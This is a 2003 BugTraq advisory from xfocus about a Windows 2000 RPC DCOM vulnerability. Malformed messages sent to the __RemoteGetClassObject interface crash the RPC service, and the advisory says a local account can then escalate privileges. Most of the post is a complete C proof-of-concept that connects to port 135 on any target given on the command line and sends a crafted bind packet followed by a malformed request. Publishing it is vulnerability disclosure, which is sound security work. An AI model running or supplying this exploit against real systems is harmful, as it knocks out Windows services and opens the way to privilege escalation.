BugTraq
Microsoft Windows 2000 RPC DCOM Interface DOS AND Privilege Escalation Vulnerability Jul 20 2003 07:01PM
benjurry (benjurry xfocus org)


Microsoft Windows 2000 RPC DCOM Interface DOS AND Privilege Escalation Vulnerability

1.Description:

There is a vulnerability in the part of RPC that deals with message exchange over TCP/IP. The failure results because of incorrect handling of malformed messages.

By sending a malformed messages to DCOM __RemoteGetClassObject interface,The RPC Service will be crashed,and all service and application depending on RPC service will be abnormal.

If attacker have an account ,he can hijack epmapper pipe and 135 port Privilege Escalation after RPC service is crash.

2.Affected Systems:Windows 2000 +SP3

Windows 2000 +SP4+

3.Proof of concept codes:

#include <winsock2.h>

#include <stdio.h>

#include <windows.h>

#include <process.h>

#include <string.h>

#include <winbase.h>

unsigned char bindstr[]={

0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x
00,0x00,

0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x
01,0x00,

0xA0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x
00,0x46,

0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x
08,0x00,

0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request[]={

0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x13,0x00,0x
00,0x00,

0x90,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x05,0x00,0x06,0x01,0x00,0x00,0x
00,0x00,

0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x
31,0x31,

0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x
31,0x31,

0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};

void main(int argc,char ** argv)

{

WSADATA WSAData;

int i;

SOCKET sock;

SOCKADDR_IN addr_in;

short port=135;

unsigned char buf1[0x1000];

printf("RPC DCOM DOS Vulnerability discoveried by Xfocus.org\n");

printf("Code by FlashSky,Flashsky (at) xfocus (dot) org [email concealed],benjurry,benjurry (at) xfocus (dot) org [email concealed]\n");

printf("Welcome to http://www.xfocus.net\n");

if(argc<2)

{

printf("useage:%s target\n",argv[0]);

exit(1);

}

if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)

{

printf("WSAStartup error.Error:%d\n",WSAGetLastError());

return;

}

addr_in.sin_family=AF_INET;

addr_in.sin_port=htons(port);

addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);

if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)

{

printf("Socket failed.Error:%d\n",WSAGetLastError());

return;

}

if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)

{

printf("Connect failed.Error:%d",WSAGetLastError());

return;

}

if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)

{

printf("Send failed.Error:%d\n",WSAGetLastError());

return;

}

i=recv(sock,buf1,1024,MSG_PEEK);

if (send(sock,request,sizeof(request),0)==SOCKET_ERROR)

{

printf("Send failed.Error:%d\n",WSAGetLastError());

return;

}

i=recv(sock,buf1,1024,MSG_PEEK);

}

5.About XFOCUS.ORG

Xfocus is a non-profit and free technology organization which was founded in 1998 in China. We are devoting to research and demonstration of weaknesses related to network services and communication security.

We hope that we can use new technical tools to achieve our goal, and to broaden our outlook. We also hope we can communicate and help with each other through this amazing Internet.

This site is created for publishing some documents , codes and utilities of our research work. Any suggestions are welcome , please contact us at webmaster_at_xfocus.org .

From the Internet. For the Internet. Have fun!

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus